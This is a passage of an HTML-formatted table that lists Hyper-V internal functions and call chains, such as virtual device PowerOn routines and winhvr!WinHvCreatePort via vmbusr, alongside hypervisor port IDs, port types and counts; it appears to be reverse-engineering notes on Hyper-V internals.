</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10003</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="7" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!SynthKeyboardDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10004</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="8" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmuidevices!VideoSynthDevice::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10005</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="9" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ActivationVDev!CSppActivationVDevT<CEmptyType>::PostReset</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10006</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="10" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmicvdev!ICVdevDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10007</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="11" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmicrdv!ICRdvVdevDevice::PowerOnCold</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10008</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="12" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VmSynthNic!SynthNic::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10009</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="13" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmsynthstor!SynthStor::PowerOn</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1000a</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeEvent</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="14" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartParentCreateNewMessa</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChServerReserveChannelLoc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChmOpenReservedChannel</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">41</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvPortTypeMessage</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><ol start="15" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><br /></li>
</ol>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhvr!WinHvCreatePort</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ParentCreateMonitors</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!XPartChildConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpChildConnectLocked</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChpNegotiateVersionLocked</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 7.1pt; margin-top: 0pt; text-align: center;">
